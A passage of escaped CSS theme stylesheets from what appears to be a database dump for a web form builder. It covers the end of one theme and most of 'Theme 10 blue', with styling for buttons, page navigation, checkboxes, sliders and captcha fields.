\"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFD9B8;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFB471;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF983C; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f6a965), color-stop(67%, #f6a965), color-stop(100%, #ff983c)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #FFD9B8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #FF983D;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(36,'Theme 10 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D1E0F0;\r\nborder: 1px solid #075DA4;\r\nmargin-bottom: 10px;\r\ncolor: #075DA4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/02/next_hoverbg.png) url([SITE_ROOT]/images/01/02/previous_hover.png) url([SITE_ROOT]/images/01/02/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: \"\";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/02/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #035192 ;\r\nbackground: -moz-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #035192 ), color-stop(20%, #0860A9 ), color-stop(80%, #0860A9 ), color-stop(100%, #035192 ));\r\nbackground: -webkit-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -o-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -ms-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: linear-gradient(to right, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #3A8BCF;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #063A66;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D1E0F0;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #004D8E;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0559A0 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #00457F ), color-stop(20%, #0559A0 ), color-stop(80%, #0E6AB8 ), color-stop(100%, #006CC7 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"password\"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #0D5492;\r\n	cursor: pointer;\r\n	background-color: #7FA6C6;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #004D8E;\r\n	margin: 1px;\r\n	display: 